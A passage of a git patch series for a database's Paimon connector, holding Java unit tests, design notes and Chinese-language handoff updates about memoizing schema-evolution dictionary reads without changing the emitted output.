plainHandle(); + + RecordingPaimonCatalogOps opsA = new RecordingPaimonCatalogOps(); + opsA.table = base; + // 2-arg ctor: fresh per-instance memo => first build is a direct read => pre-fix behavior. + String encodedA = new PaimonScanPlanProvider(Collections.emptyMap(), opsA) + .getScanNodeProperties(null, handle, Collections.emptyList(), Optional.empty()) + .get("paimon.schema_evolution"); + + RecordingPaimonCatalogOps opsB = new RecordingPaimonCatalogOps(); + opsB.table = base; + // 4-arg ctor with a shared memo (first build is also a direct read, then cached). + String encodedB = new PaimonScanPlanProvider(Collections.emptyMap(), opsB, null, + new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE)) + .getScanNodeProperties(null, handle, Collections.emptyList(), Optional.empty()) + .get("paimon.schema_evolution"); + + // WHY: the memo changes only HOW fields are read, never WHAT is emitted -> the dict must be + // byte-identical to the non-memo path (no order/dedup/membership change -> zero BE-crash + // surface). MUTATION: the memo altering the emitted entries -> encodedA != encodedB -> red. + Assertions.assertNotNull(encodedA); + Assertions.assertEquals(encodedA, encodedB, + "the memoized dict must be byte-identical to the non-memo (pre-fix) emission"); + } + } + + @Test + public void schemaEvolutionDictSkippedUnderForceJniLeavesMemoEmpty(@TempDir Path warehouse) throws Exception { + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + FileStoreTable base = createSingleSchemaTable(catalog); + + // (a) a force-jni handle (binlog): the whole dict is gated off, so the memo must stay empty. + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.sysTable = base; + ops.table = base; + PaimonTableHandle binlog = PaimonTableHandle.forSystemTable("db", "t", "binlog", true); + PaimonSchemaAtMemo memo = new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE); + Map props = new PaimonScanPlanProvider(Collections.emptyMap(), ops, null, memo) + .getScanNodeProperties(null, binlog, Collections.emptyList(), Optional.empty()); + Assertions.assertFalse(props.containsKey("paimon.schema_evolution"), + "a force-jni handle skips the schema dict"); + Assertions.assertEquals(0, memo.size(), + "force-jni must not consult/populate the schema memo (guards a read moved above the gate)"); + + // (b) force_jni_scanner=true session on a plain handle: same gate. + RecordingPaimonCatalogOps ops2 = new RecordingPaimonCatalogOps(); + ops2.table = base; + PaimonSchemaAtMemo memo2 = new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE); + Map props2 = new PaimonScanPlanProvider(Collections.emptyMap(), ops2, null, memo2) + .getScanNodeProperties( + sessionWithProps(Collections.singletonMap("force_jni_scanner", "true")), + plainHandle(), Collections.emptyList(), Optional.empty()); + Assertions.assertFalse(props2.containsKey("paimon.schema_evolution")); + Assertions.assertEquals(0, memo2.size()); + } + } + + @Test + public void getScanPlanProviderInjectsSharedSchemaMemo(@TempDir Path warehouse) { + Map props = new HashMap<>(); + props.put("warehouse", warehouse.toUri().toString()); + PaimonConnector connector = new PaimonConnector(props, new RecordingConnectorContext()); + PaimonScanPlanProvider p1 = (PaimonScanPlanProvider) connector.getScanPlanProvider(); + PaimonScanPlanProvider p2 = (PaimonScanPlanProvider) connector.getScanPlanProvider(); + + // WHY: the cross-scan memo benefit hinges on getScanPlanProvider() injecting the connector's SHARED + // memo (the 4-arg ctor). MUTATION: dropping the schemaAtMemo arg -> each provider gets a fresh memo + // -> not the same instance -> red (and the fix would silently no-op cross-scan memoization). + Assertions.assertSame(p1.schemaAtMemoForTest(), p2.schemaAtMemoForTest(), + "getScanPlanProvider() must inject the connector's shared schema memo, not a fresh one"); + } } diff --git a/plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-design.md b/plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-design.md new file mode 100644 index 00000000000000..db2e2246bbfe12 --- /dev/null +++ b/plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-design.md @@ -0,0 +1,147 @@ +# FIX-B-R2-be — memoize the schema-evolution dict's per-schema reads (NO PERF REGRESSION) + +> Source: `task-list-P6-deviation-fixes.md` §B-R2-be + `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §R2 (be). +> Single-task loop: design → design red-team → implement → impl-verify → build+UT → commit. +> **User decision (this session): Option A — memoize the reads, keep the eager superset emission** (the +> "narrow to referenced ids" option was found architecturally infeasible connector-only + BE-crash-prone; +> see below). Hard constraint: **NO performance regression.** + +## Problem & why narrowing was rejected + +`buildSchemaEvolutionParam` (`PaimonScanPlanProvider.java:1298-1317`) builds the BE `history_schema_info` +dict by reading **every** committed schema: `for (Long schemaId : schemaManager.listAllIds()) { history.add( +buildSchemaInfo(schemaId, schemaManager.schema(schemaId).fields(), false)); }` — one schema-file read per +committed schema, **every scan**, even when the query's files touch only one schema id. Legacy added +entries lazily, one per distinct file `schema_id` a split referenced (+ the `-1` current entry). + +**Narrowing (the task-list's primary fix) is infeasible connector-only and was rejected** (verified against +code): the dict is built in `getScanNodeProperties`, but the referenced schema_ids are only known in +`planScan`; `connector.getScanPlanProvider()` returns a NEW provider per call (`PaimonConnector.java:108`) +so no instance field can bridge them; the dict build fires lazily and **often before** splits are planned +(triggers: `getNodeExplainString:258`, `getSerializedTable:925`, conjunct-pruning, or +`createScanRangeLocations:940` after `super`→`getSplits`); the referenced set is per-scan (depends on +partition-pruning + predicates) so a table-keyed cache is imprecise/racy; the generic bridge must not +collect `paimon.schema_id` (connector-agnostic rule); and re-planning in the props build is forbidden (new +I/O = regression). An under-covering narrowed set **hard-crashes BE** (`table_schema_change_helper.h` +"miss table/file schema info", cf. CI 969249). → **Memoize instead.** + +## Design — Option A: memoize the per-schema-id read, emission UNCHANGED + +Keep `listAllIds()` and the full dict emission **byte-identical** (the dict still covers every committed +schema → always covers any file's schema_id → **zero BE-crash risk**). Only change HOW each historical +entry's fields are obtained: read through a **connector-level, immutable, bounded memo** keyed by +`(table-identity, schemaId)`, so the schema-file reads are served from cache across scans (a committed +schemaId's fields are write-once → no TTL; cleared on REFRESH = connector rebuild). + +**Reuse the existing `PaimonSchemaAtMemo` (the B-MC2 memo).** The fact being cached — "the fields of table T +at committed schema version S" — is EXACTLY what `PaimonSchemaAtMemo` already holds (`PaimonSchemaSnapshot`, +keyed by `MemoKey(handle, schemaId)`, immutable). Both features call the SAME underlying read +`schemaManager.schema(schemaId)`. Caching it ONCE and serving both the time-travel path (B-MC2) and the +schema-evolution dict (this fix) is the DRY, efficient design. + +**Consistency proof (same key → same value across the two features) — MUST hold. PRIMARY proof = the +write-once invariant (NOT object identity):** +- **Write-once invariant (the load-bearing argument):** for any committed `schemaId`, + `schemaManager.schema(schemaId)` reads the **immutable, write-once `schema-` file** — its content is + independent of WHICH `Table` instance's `schemaManager` reads it (B-MC2's UNPINNED `resolveTable`, or this + fix's snapshot-PINNED `resolveScanTable` = `table.copy(scan.snapshot-id=…)`). `MemoKey` deliberately + excludes `scanOptions` from identity (`PaimonTableHandle.equals`), so the pinned and unpinned reads + legitimately share ONE key, and the `scan.snapshot-id` pin does NOT change which committed schema file a + given `schemaId` resolves to. So the same `MemoKey` always yields the same `fields()`. (Object identity of + the `Table` is NOT required and does NOT hold for a time-travel scan — only value-equality, which the + write-once invariant guarantees.) +- `$ro`: B-MC2 NEVER writes `$ro` keys (system tables skip the at-snapshot path — `resolveTimeTravel`/ + `beginQuerySnapshot` return empty for sys, and `getTableSchema(snapshot)` short-circuits on the default + `schemaId<0`). This fix writes the BASE table's schema under the `$ro`-handle key (handle sysName="ro", + `schemaDictTable`=base). No B-MC2 value to conflict; internally consistent. (Minor: a `t` query and a + `t$ro` query don't share — different sysName — so `$ro` re-reads the base schemas once. Acceptable; rare.) +- branch: both writers key by `(db, table, branch)` and both read the branch FileStoreTable's + `schemaManager.schema(id)` (the same write-once branch schema file) — identical value. + +**Loader keeps the DIRECT read (not `catalogOps.schemaAt`)** so the existing real-`FileStoreTable` + +fake-`catalogOps` tests are unaffected (the schema-evolution tests build a real `FileStoreTable` via +`FileSystemCatalog` but construct the provider with a `RecordingPaimonCatalogOps`; routing the read through +`catalogOps.schemaAt` would break them). The loader returns a `PaimonSchemaSnapshot` (the memo's value type) +built from the same direct read: +```java +List fields = schemaAtMemo.getOrLoad(handle, schemaId, () -> { + TableSchema ts = schemaManager.schema(schemaId); // the read the finding flags + return new PaimonCatalogOps.PaimonSchemaSnapshot(ts.fields(), ts.partitionKeys(), ts.primaryKeys()); +}).fields(); +history.add(buildSchemaInfo(schemaId, fields, false)); +``` +`schemaId` and `schemaManager` are effectively final per loop iteration. Loader exceptions propagate +uncached (`getOrLoad` puts only after the loader returns) → the "schema reads that throw fail loud" javadoc +contract is preserved. + +### Components + +1. **`PaimonScanPlanProvider`**: add a `private final PaimonSchemaAtMemo schemaAtMemo;` field; a new + **package-private** 4-arg ctor `(properties, catalogOps, context, schemaAtMemo)`; the existing public + 2-arg and 3-arg ctors delegate to it with a **fresh** `new PaimonSchemaAtMemo(PaimonSchemaAtMemo + .DEFAULT_MAX_SIZE)` (so the ~8 existing provider construction sites + any non-production caller are + unchanged — a fresh per-instance memo is correct, just no cross-scan sharing they don't need). +2. **`PaimonConnector.getScanPlanProvider()`**: pass the connector's existing `schemaAtMemo` (the same one + `getMetadata` injects) into the provider — so the time-travel path and the scan dict share ONE + per-catalog cache. +3. **`buildSchemaEvolutionParam`**: take the `PaimonTableHandle` (thread it from `getScanNodeProperties:663`) + and memo-wrap the per-id read as above. Everything else (the `-1` current entry via + `resolveCurrentSchemaFields`, `listAllIds()`, the encoding) is UNCHANGED. + +## NO-regression / safety (must hold + be red-team-verified) + +1. **Emission unchanged → zero BE-crash risk.** The dict still has the `-1` entry + one entry per + `listAllIds()` id — byte-identical to today. BE always finds any file's schema_id. The fix touches only + the read mechanism, never WHAT is emitted. +2. **Immutable value, collision-free key.** A committed schemaId's fields are write-once; the + `(handle-identity, schemaId)` key is collision-free (handle identity = db+table+sysName+branch). Cleared + only on REFRESH (connector rebuild → fresh memo). No TTL, no stale read. +3. **Worst case = current.** Miss → the same direct read as today + an O(1) put; hit → the read is skipped + (faster, the win); overflow/concurrent-double-load → a re-read = today. Never more work than today. +4. **No new I/O, order-independent.** The memo does not depend on planScan/props ordering (unlike + narrowing); `listAllIds()` still runs each scan (a cheap directory listing — unchanged); only the + per-schema-file reads are cached. + +## Files + +- `fe-connector-paimon/.../PaimonScanPlanProvider.java` (ctor + field + `buildSchemaEvolutionParam` memo + thread handle) +- `fe-connector-paimon/.../PaimonConnector.java` (`getScanPlanProvider` injects `schemaAtMemo`) +- `fe-connector-paimon/.../test/.../PaimonScanPlanProviderTest.java` (new memoization test) + +## Test Plan (RED→GREEN; red-team's 6 findings folded in) + +1. **Dict build populates the shared memo (core RED→GREEN):** evolve a real `FileStoreTable` to K committed + schemas (via `FileSystemCatalog`, like the existing schema-evolution tests; `Catalog.alterTable` + + `SchemaChange.addColumn`); build a provider with a shared `PaimonSchemaAtMemo` (4-arg ctor); call + `getScanNodeProperties` → assert `memo.size() == K` (the K historical entries were read through the memo; + the `-1` entry does NOT use it). **RED before:** `buildSchemaEvolutionParam` reads directly → `size == 0`. + Also assert the memo's KEY SET is exactly `{(handle,0..K-1)}` (not just the count). +2. **Cache HIT is positively observable (sentinel pre-seed — fixes the false-pass gap):** seed the SHARED + memo for ONE `(handle, schemaId=X)` with a **sentinel** `PaimonSchemaSnapshot` whose field list DIFFERS + from the real schema (e.g. a renamed/extra `DataField` "SENTINEL_FROM_MEMO") via `memo.getOrLoad(handle, + X, () -> sentinel)`; then call `getScanNodeProperties`, **decode** the emitted `paimon.schema_evolution` + (via `applySchemaEvolutionParam` like the existing `$ro` test at `:602`), and assert the schemaId=X entry + carries the SENTINEL field (proving the build returned the CACHED value and skipped the real + `schemaManager.schema(X)` read). **RED before:** the real read overwrites → no SENTINEL → fails. +3. **Byte-identical emission vs the NON-memo baseline (safety):** on the SAME evolved table, capture + `encodedA` from a provider built with the 2/3-arg ctor (fresh per-instance memo → first build = direct + read = pre-fix behavior) and `encodedB` from the 4-arg-ctor provider (shared memo); assert + `encodedA.equals(encodedB)`. Proves the memoized path emits a byte-identical dict (no order/dedup/membership + change → zero BE-crash surface). The existing schema-evolution / `$ro` tests also stay green (2-arg ctor). +4. **force-JNI → memo NOT populated:** with a shared memo, call `getScanNodeProperties` (a) on a force-jni + handle (`isForceJni()`, e.g. a binlog sys handle) and (b) with `force_jni_scanner=true` + (`sessionWithProps`) → assert `paimon.schema_evolution` ABSENT AND `memo.size()==0` (the dict — and the + read — is gated off; guards a future regression moving the read above the gate). +5. **Connector wiring (the perf benefit hinges on ONE edit):** assert `connector.getScanPlanProvider()` and + `connector.getMetadata()` observe the SAME `PaimonSchemaAtMemo` instance, and two successive + `getScanPlanProvider()` calls share it — pins the `getScanPlanProvider` 4-arg injection so the fix can't + silently no-op (fresh per-provider memo) while still emitting a correct dict. Needs a package-private + accessor on the provider (and possibly the connector) exposing the memo for the identity assertion. + +### E2E +Gated (`enablePaimonTest=false`) — NOT run. The UTs (sentinel HIT proof + byte-identical baseline + wiring) +are the proof. + +## Decision (post red-team): REUSE `PaimonSchemaAtMemo` +All four lensVerdicts judged the design correct and explicitly recommended **REUSE** (the consistency proof +holds via the write-once invariant; a dedicated memo is unnecessary). No reuse→corruption case was found. diff --git a/plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-summary.md b/plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-summary.md new file mode 100644 index 00000000000000..9ce32750f7268e --- /dev/null +++ b/plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-summary.md @@ -0,0 +1,65 @@ +# FIX-B-R2-be — memoize the schema-evolution dict's per-schema reads — SUMMARY + +> Deviation 5/5 (LAST) of the P6 deviation→fix batch. Single-task loop: design → design red-team +> (`wf_222e1abd-655`) → implement → impl-verify (agent `a00f6071f82920bda`) → build+UT (RED→GREEN) → commit. +> **User decision: Option A — memoize the reads, keep the eager superset emission.** Detail: +> `FIX-B-R2-BE-SCHEMA-DICT-MEMO-design.md`. + +## Problem & why narrowing was rejected + +`buildSchemaEvolutionParam` builds BE's `history_schema_info` dict by reading **every** committed schema +(`schemaManager.listAllIds()` + `schemaManager.schema(id).fields()`) on **every scan**, even when the +query's files touch one schema. Legacy added entries lazily per referenced file `schema_id`. + +The task-list's "narrow to referenced ids" is **architecturally infeasible connector-only and BE-crash-prone**: +`getScanPlanProvider()` returns a NEW provider per call (so planScan's split schema_ids can't reach the dict +build); the dict is built lazily and often BEFORE splits are planned; the referenced set is per-scan; the +generic bridge can't collect `paimon.schema_id`; re-planning in props is forbidden (new I/O); and an +under-covering set hard-crashes BE (CI 969249). The user chose **memoization** instead. + +## Fix (Option A) + +Keep `listAllIds()` and the dict emission **byte-identical** (full superset → always covers any file's +schema_id → **zero BE-crash risk**); only the per-schema-id field READ is served from a connector-level +immutable memo. **Reuse the existing B-MC2 `PaimonSchemaAtMemo`** — it already caches exactly this fact +(`(handle, schemaId) → schema fields`, write-once, cleared on REFRESH): + +- `PaimonScanPlanProvider`: new **package-private** 4-arg ctor `(props, catalogOps, context, schemaAtMemo)`; + the public 2/3-arg ctors delegate with a **fresh** memo (so ~25 existing construction sites are + behavior-identical — first build = direct read = pre-fix). `buildSchemaEvolutionParam` now takes the + `PaimonTableHandle` and wraps the `listAllIds` loop read in `schemaAtMemo.getOrLoad(handle, schemaId, …)`; + the loader keeps the **DIRECT** read (`schemaManager.schema(id)` → `PaimonSchemaSnapshot`, NOT + `catalogOps.schemaAt`, so the real-table + fake-catalogOps tests are unaffected). The `-1` current entry + is NOT memoized (live read). +- `PaimonConnector.getScanPlanProvider()`: injects the SAME per-catalog `schemaAtMemo` that `getMetadata` + uses, so the dict reads are memoized across scans and shared with the B-MC2 time-travel path. + +**Consistency (same key → same value across both features), validated by design red-team + impl-verify:** +the cached fact is the **write-once committed `schema-` file**, identical regardless of which `Table` +instance's `schemaManager` reads it (B-MC2's unpinned `resolveTable` vs this fix's snapshot-pinned +`resolveScanTable`); `MemoKey` excludes `scanOptions` and mirrors `PaimonTableHandle` identity exactly; and +B-MC2 NEVER writes a `$ro`/sys key (sys handles short-circuit before the at-snapshot memo write). No +corruption case found. + +## No-regression / safety + +Emission unchanged → zero new BE-crash surface. Miss = today's read + O(1) put (the full snapshot adds no +I/O — `partitionKeys()/primaryKeys()` are O(1) on the already-read `TableSchema`); hit = the read is skipped; +overflow/concurrent-double-load = a re-read. Loader exceptions propagate uncached (fail-loud preserved). +Order-independent (unlike narrowing). + +## Tests (+5 `PaimonScanPlanProviderTest`, RED→GREEN; red-team's 6 findings folded in) + +- `schemaEvolutionDictPopulatesSharedMemo` (memo populated with K entries), `…ReadsFromMemoOnHit` (sentinel + pre-seed surfaces in the dict → proves a cache HIT, the MAJOR test-gap fix), `…ByteIdenticalWithMemo` + (memo path == non-memo baseline → emission unchanged), `…SkippedUnderForceJniLeavesMemoEmpty` (force-jni / + `force_jni_scanner` gate off the dict + memo), `getScanPlanProviderInjectsSharedSchemaMemo` (connector + injects the shared memo — pins the wiring so the fix can't silently no-op). +- **RED proof:** memo-bypass → the populate + sentinel-HIT tests fail; drop the `getScanPlanProvider` + injection → the wiring test fails; the byte-identical + force-jni guards correctly stay green. + +## Result + +Full paimon module **303 tests, 0 failures, 1 skipped** (298 + 5), checkstyle 0, import-check 0, clean +rebuild BUILD SUCCESS. Connector-only (no fe-core / SPI / BE change). e2e gated (`enablePaimonTest=false`) +— NOT run. **This was the LAST of the 5 P6 deviation→fixes** (A3 / A2 / B-MC2 / A1 / B-R2-be all done). From f650e0bf01dbbade9bf5127b33b4cda7598ba7b3 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 18:57:16 +0800 Subject: [PATCH 120/128] =?UTF-8?q?docs(catalog-spi):=20P6=20B-R2-be=20(sc?= =?UTF-8?q?hema-dict=20memo)=20fix=20done=20=E2=86=92=20ALL=205=20deviatio?= =?UTF-8?q?n=20fixes=20complete?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 33 +++++++++++++++++------- plan-doc/task-list-P6-deviation-fixes.md | 21 +++++++++++++-- 2 files changed, 42 insertions(+), 12 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index f15ddb772f5656..b6f6d6bf20d790 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,7 +6,7 @@ --- -# 🎯 下一个 session 的任务 — **B-R2-be(schema-evolution 字典收窄到规划 split 的 schema_id,⚠️ NO PERF REGRESSION + BE-fail-loud 守卫)→ 见 `task-list-P6-deviation-fixes.md`**(5 个 deviation→fix:**A3 ✅ `5fa47c27eb8` / A2 ✅ `1935748d6c3` / B-MC2 ✅ `10284edbf88` / A1 ✅ `9d687145a28` 已完成**,剩 B-R2-be 一项即清零本批) +# 🎯 下一个 session 的任务 — **P6-DEVIATIONS 余项 accept-as-deviation 签字 → 见 `task-list-P6-fixes.md` backlog 0 末项**(5 个 deviation→fix **全部完成**:A3 ✅ `5fa47c27eb8` / A2 ✅ `1935748d6c3` / B-MC2 ✅ `10284edbf88` / A1 ✅ `9d687145a28` / B-R2-be ✅ `60ed665c4dc`。**本批清零。** 下一步=把未转 fix 的剩余 MINOR/NIT 刻意偏离 + wave2 新增 + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常逐条记入新建 `deviations-log.md`(含用户签字);之后 B8 legacy 删除/元存储子线 P2-T04/05) > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 @@ -18,6 +18,18 @@ > **RED→GREEN 两次独立跑验证**:未修代码 weight-0 测失败 1,修后 3/0);283/0/0/1skip + checkstyle0 + import0;design 红队 > `wf_3f2cd605-2a8`(9 候选→0-actionable on code)、impl-verify **APPROVE**;e2e gated 未跑。详见 > `designs/FIX-A3-SELF-SPLIT-WEIGHT-{design,summary}.md`。 +> **✅ B-R2-be (NIT, intentional, deviation 5/5 = LAST, ⚠️NO PERF REGRESSION) `60ed665c4dc`**:schema-evolution +> 字典的 per-schema-id 读做 memo。**收窄方案被否(架构上连接器内做不到 + BE 崩风险)**:props 常先于 split 构建、 +> `getScanPlanProvider()` 每次 new provider 故 planScan 的 schema_id 到不了字典构建、引用集是 per-scan、通用桥不能收 +> `paimon.schema_id`、props 里重 plan=新 I/O、收窄漏发即 BE 硬崩(CI 969249)。**用户选 Option A=memo 读、保贪婪全集发射**: +> 字典发射**字节不变**(全 `listAllIds()`→永覆盖→零 BE 崩险),只把 per-schema-id 字段**读**走连接器级不可变 memo—— +> **复用 B-MC2 `PaimonSchemaAtMemo`**(已缓存同一 write-once 事实 `(handle,schemaId)→fields`)。新 package-private 4-arg +> provider ctor(2/3-arg 委托 fresh memo→~25 处不变);`buildSchemaEvolutionParam` 收 handle + memo 包 loop(loader 走 +> **直读** `schemaManager.schema(id)` 非 `catalogOps.schemaAt`,real-table+fake-catalogOps 测不破);`getScanPlanProvider()` +> 注入共享 memo。一致性(同 key 同值)经 write-once 不变式 + B-MC2 从不写 $ro/sys key 验证。+5 UT(memo-populated/ +> sentinel-HIT/byte-identical/force-jni/wiring)各 RED→GREEN;303/0/1skip;checkstyle0+import0;design 红队 +> `wf_222e1abd-655`(4 lens sound、荐复用、6 actionable 折叠)、impl-verify COMMIT_AS_IS(0 defect);e2e gated 未跑。 +> 详见 `designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-{design,summary}.md`。 > **✅ A1 (MINOR, FE 调度回归, deviation 4/5) `9d687145a28`**:把连接器算好的比例 split weight 接到 FE `FileSplit` > 调度字段(`FederationBackendPolicy` 按大小分配,legacy parity;FE BE-分配 only,不改行/路由/BE读/结果)。SPI > `ConnectorScanRange` 加默认 `getSelfSplitWeight()`/`getTargetSplitSize()`(哨兵 -1);`PluginDrivenSplit` ctor @@ -77,12 +89,11 @@ > `PaimonMetadataOps:340` 完全一致(且所有其它连接器都 propagate),原先吞成 emptyList 且注释谎称 parity。280/0 paimon(+1 > gated skip)+16/0+3/0+14/0+12/0;fe-core 编译过;checkstyle 0;import-check 干净;design+impl 两道红队均 0-actionable;e2e gated。 > 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`(design 红队 `wf_444e33b9-5c6`、impl 红队 `wf_b3d35e64-6b9`)。 -> **下一个 = B-R2-be(A3 `5fa47c27eb8` / A2 `1935748d6c3` / B-MC2 `10284edbf88` / A1 `9d687145a28` 已完成);剩 1 个 deviation→fix(用户决定修,非接受)**:走单任务循环 -> (详单见 **`task-list-P6-deviation-fixes.md`**):**B-R2-be** schema-evolution 字典收窄到 -> 规划 split 的文件 schema_id(= legacy,K≤N 无回退;守卫=覆盖每个 `:483` 发的 per-file schema_id 否则 BE 硬崩;注意 -> getScanNodeProperties vs planScan 次序——需把 id 集从 planScan 透传,勿在 props 里重枚举 split)。 -> ⚠️ **B-R2-be 硬约束 = 不得有性能回退**:design 必须复现 task-list 的无回退论证、红队必须验证(B-MC2 同约束已照此完成)。**这 1 项做完,再回到 P6-DEVIATIONS -> 余项**(剩余 MINOR/NIT + `PluginDrivenExternalCatalog:140` 吞异常 → `deviations-log.md` 签字)即清零 P6-fixes 批。 +> **5 个 deviation→fix 全部完成**(A3 `5fa47c27eb8` / A2 `1935748d6c3` / B-MC2 `10284edbf88` / A1 `9d687145a28` +> / B-R2-be `60ed665c4dc`)。**下一个 = P6-DEVIATIONS 余项 accept-as-deviation 签字**:未转 fix 的剩余 MINOR/NIT +> 刻意偏离 + wave2 新增 + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常 → 逐条记入新建 +> `deviations-log.md`(含用户签字)。**注**:B-R2-be 的「收窄」方案经分析架构不可行(见上方 ✅ B-R2-be 条 + 设计文档), +> 已与用户确认改用 memo(Option A),亦应在 deviations-log 记一条「R2-be 收窄不可行→memo」的决策。之后才是 P6-fixes 批清零。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 报告:[`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md)(未跟踪,待 vet+commit)。 @@ -147,8 +158,10 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 `PaimonScanRange` 携 `targetSplitSize`(默认 -1);`PaimonScanPlanProvider` 算 denominator(legacy 64MB 公式) 穿到每 builder + **native 范围补 `selfSplitWeight=length+DV`**(task-list 漏的关键缺口,native 是默认路径否则均匀)。 fe-core 5 + api 1 + 连接器 5 新 UT 各 RED→GREEN;298/0/1skip+5/0+44/0;两道红队全过。详见 `designs/FIX-A1-SPLIT-WEIGHT-*.md`。 - - **剩 1 个 deviation→fix(下一个 = B-R2-be,用户决定修)**:B-R2-be,走单任务循环。完整详单(机制/ - 修法/文件/**B-R2-be 的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。 + - ✅ **B-R2-be**(NIT intentional,⚠️NO PERF REGRESSION)— **DONE `60ed665c4dc`**:收窄方案架构不可行→ + 用户选 Option A=memo per-schema-id 读、保贪婪全集发射(字节不变→零 BE 崩险);复用 B-MC2 `PaimonSchemaAtMemo`; + +5 UT RED→GREEN;303/0/1skip;红队+impl-verify 全过。详见 `designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-*.md`。 + - **5 个 deviation→fix 全部完成(本批清零);下一个 = 下面这条 P6-DEVIATIONS 余项签字。** - **P6-DEVIATIONS 余项(5 项之后,本批最后一项)**:未转 fix 的剩余 MINOR/NIT 刻意偏离 + wave2 新增 + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常(R3/R4/R5/R6 residual 属 B8 清理、2 BLOCKER 属 B8 护栏, 均不在此)。逐条记入新建 `deviations-log.md` accept-as-deviation(含用户签字)。 @@ -174,7 +187,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `9d687145a28`**(FIX-A1 split-weight;前序 `10284edbf88` B-MC2、`1935748d6c3` A2、`5fa47c27eb8` A3、`82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `60ed665c4dc`**(FIX-B-R2-be schema-dict memo;前序 `9d687145a28` A1、`10284edbf88` B-MC2、`1935748d6c3` A2、`5fa47c27eb8` A3、`82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); remote `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head)仍在 `82b6de0de98`, **本地领先:A3 起的 deviation fix commits 尚未 push** → 待本批 deviation fix 做完,session 收尾一次性 force-with-lease push + PR 评论 `run buildall`(见 §Commit 须知 / memory `catalog-spi-07-paimon-branch-pr-workflow`)。 diff --git a/plan-doc/task-list-P6-deviation-fixes.md b/plan-doc/task-list-P6-deviation-fixes.md index 400d1d6ab0fceb..aeb7688f963bb6 100644 --- a/plan-doc/task-list-P6-deviation-fixes.md +++ b/plan-doc/task-list-P6-deviation-fixes.md @@ -15,7 +15,9 @@ ## Suggested order (independent; smallest blast radius first) -A3 → A2 → B-MC2 → A1 → B-R2-be (✅ A3 / ✅ A2 / ✅ B-MC2 / ✅ A1 done; next = **B-R2-be**, last of the 5) +A3 → A2 → B-MC2 → A1 → B-R2-be (✅ ALL 5 DONE: A3 `5fa47c27eb8` / A2 `1935748d6c3` / B-MC2 `10284edbf88` +/ A1 `9d687145a28` / B-R2-be `60ed665c4dc`. **Batch complete.** Next batch item = P6-DEVIATIONS 余项 +accept-as-deviation signing → `task-list-P6-fixes.md`.) --- @@ -143,7 +145,22 @@ A3 → A2 → B-MC2 → A1 → B-R2-be (✅ A3 / ✅ A2 / ✅ B-MC2 / ✅ A1 d ## B-R2-be — `history_schema_info` eager superset → narrow to referenced schema_ids (NIT / intentional) — **NO PERF REGRESSION** -- [ ] **B-R2-be** +- [x] **B-R2-be** — DONE `60ed665c4dc`. **Narrowing was REJECTED as architecturally infeasible connector-only + + BE-crash-prone** (props build before splits; `getScanPlanProvider()` returns a NEW provider per call so + planScan's schema_ids can't reach the dict build; the referenced set is per-scan; the generic bridge can't + collect `paimon.schema_id`; re-planning in props = new I/O; an under-covering narrowed set hard-crashes BE + per CI 969249). **User chose Option A = memoize the reads, keep the eager superset emission.** Implemented: + the dict emission stays **byte-identical** (full `listAllIds()` → always covers → zero BE-crash risk); only + the per-schema-id field READ is served from a connector-level immutable memo — **REUSING the B-MC2 + `PaimonSchemaAtMemo`** (it already caches `(handle,schemaId)→schema fields`, the same write-once fact). + New package-private 4-arg provider ctor (2/3-arg delegate with a fresh memo → ~25 sites unchanged); + `buildSchemaEvolutionParam` takes the handle + memo-wraps the loop (DIRECT-read loader, not + `catalogOps.schemaAt`, so real-table+fake-catalogOps tests unaffected); `getScanPlanProvider()` injects the + shared per-catalog memo. Consistency (same key→same value across both features) verified via the write-once + invariant + B-MC2-never-writes-$ro/sys. +5 UT (memo-populated / sentinel-HIT / byte-identical / force-jni / + wiring) each RED→GREEN; 303/0/1skip; checkstyle 0; import-check 0. design red-team `wf_222e1abd-655` (4 + lenses sound, recommended REUSE, 6 actionable 